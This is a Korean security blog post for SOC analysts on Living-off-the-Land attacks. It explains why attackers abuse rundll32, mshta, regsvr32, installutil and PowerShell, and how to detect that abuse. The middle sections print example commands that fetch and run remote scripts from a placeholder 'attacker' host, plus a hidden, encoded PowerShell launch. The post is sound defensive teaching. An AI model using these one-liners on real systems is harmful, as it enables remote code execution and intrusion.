정상처럼 보이는 악성 행위 탐지 : Living-off-the-Land(LOLbins) 기반 공격 분석과 탐지 포인트

현대 공격에서 악성코드는 점점 악성처럼 보이지 않게 동작한다.
파일을 드롭하지도 않고, 알려진 악성 바이너리를 실행하지도 않는다.
대신 운영체제에 기본 포함된 정상 도구를 그대로 활용한다.

이른바 Living-off-the-Land(LOL) 공격이다.

SOC 관점에서 이 공격이 까다로운 이유는 명확하다.

• 실행 파일은 모두 Microsoft 서명
• EDR 기본 정책으로는 차단이 어려움
• “정상 관리자 행위”와 경계가 흐림

이 글에서는
1. 공격자들이 왜 특정 정상 프로세스를 집요하게 사용하는지,
2. 정상 사용과 악성 사용을 어떻게 구분할 수 있는지,
3. 탐지 룰로 연결할 수 있는 현실적인 포인트를 정리해보려고 한다.

---

왜 공격자들은 정상 프로세스를 사용할까?

공격자가 LOLbins를 선호하는 이유는 단순하다.

1. 탐지 회피 (EDR/AV 우회)

• 서명된 Microsoft 바이너리
• 허용 리스트(Allowlist)에 이미 포함
• 차단하면 업무 장애 리스크 존재

2. 파일리스(Fileless) 공격 가능

• 디스크에 악성 파일을 남기지 않음
• 메모리에서 스크립트 / 페이로드 실행

3. 운영 환경 적응력

• 모든 Windows 시스템에 기본 존재
• 추가 도구 업로드 불필요

결과적으로 차단하기 가장 어려운 방식이 된다.

---

2. 공격자가 즐겨 쓰는 대표 LOLbins 패턴

아래 프로세스들은 실제 침해사고에서 반복적으로 관찰되는 도구들이다.

 

2.1 rundll32.exe 

정상 목적

• DLL 내부 함수 호출

악용 패턴

• 원격 DLL 로드
• 스크립트 엔진(mshtml, javascript) 호출
• 인메모리 페이로드 실행

 

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write...

 

탐지 포인트

• rundll32가 URL, javascript, mshtml 문자열 포함
• 부모 프로세스가 Office, 브라우저, w3wp.exe
• 네트워크 연결 동반

 

2.2 mshta.exe — HTML 애플리케이션 실행기의 위험성

정상 목적

• HTA(HTML Application) 실행

악용 패턴

• 원격 HTA 실행
• PowerShell 로더 호출
• 브라우저 우회 실행

 

mshta.exe http://attacker/payload.hta

탐지 포인트

• 로컬 파일이 아닌 URL 기반 실행
• mshta → powershell/cmd 자식 체인
• 사용자 더블클릭 직후 실행

 

2.3 regsvr32.exe

정상 목적

• COM DLL 등록

악용 패턴 

• /s /u /i 옵션을 통한 스크립트 실행
• DLL 등록 없이 코드 실행

 

regsvr32 /s /n /u /i:http://attacker/script.sct scrobj.dll

탐지 포인트

• /i:http, .sct 사용 여부
• regsvr32가 네트워크 연결 시도
• DLL 등록 이벤트 없이 실행 종료

 

2.4 installutil.exe 

정상 목적

• .NET 서비스 설치/제거

악용 패턴

• 악성 .NET 어셈블리 실행
• Main() 없이 Installer 클래스 실행

탐지 포인트

• 업무 환경에서 거의 사용되지 않음
• 사용자 경로에서 실행되는 installutil
• installutil 실행 후 네트워크/자식 프로세스 발생

---

3. Living-off-the-Land 공격의 공통 특징

LOL 공격은 개별 도구보다 패턴이 중요하다.

공통 행위 패턴

• 사용자 문서/브라우저 → LOLbin 실행
• LOLbin → PowerShell / cmd 실행
• Base64 / EncodedCommand 사용
• 임시 경로(%TEMP%, %APPDATA%) 활용
• 실행 직후 외부 통신 발생

단일 이벤트는 정상처럼 보이지만, 연결해서 확인해보면 공격 흐름이 된다.

---

4. PowerShell : 정상 vs 악성 구분 포인트

PowerShell은 가장 많이 오용되는 도구 중 하나다.

정상 사용 특징

• 관리 서버, IT 계정
• 스크립트 파일(.ps1) 기반 실행
• 명령 가독성 높음
• 정해진 서버/시간대

악성 사용 특징

• -EncodedCommand, -nop, -w hidden
• Base64 난독화
• Office/브라우저/LOLbin 부모
• 사용자 단말에서 단발성 실행

 

powershell.exe -nop -w hidden -enc SQBFAFgA...

PowerShell 자체가 아니라 누가, 언제, 어떻게 실행했는지가 핵심이다.

---

현대 공격자는 더 이상 특별한 악성코드를 쓰지 않는다.
대신 우리 시스템에 이미 있는 도구를 가장 위험하게 사용한다.

LOLbins 공격을 막기 위해 필요한 것은 더 많은 차단이 아니라 맥락 분석이다.

이 글이 SOC·IR 환경에서 “이건 정상일까?”라는 질문에 기준선이 되기를 바란다.